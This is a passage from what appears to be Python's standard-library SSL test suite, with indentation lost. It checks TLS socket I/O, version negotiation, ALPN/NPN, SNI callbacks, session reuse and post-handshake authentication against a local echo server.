ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is listening, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and has_tls_version('TLSv1_3'):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_minimum_version
@requires_tls_version('TLSv1_1')
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_minimum_version
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # 12-byte Finished hash for TLS <= 1.2
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # 12-byte Finished hash for TLS <= 1.2
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with support.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
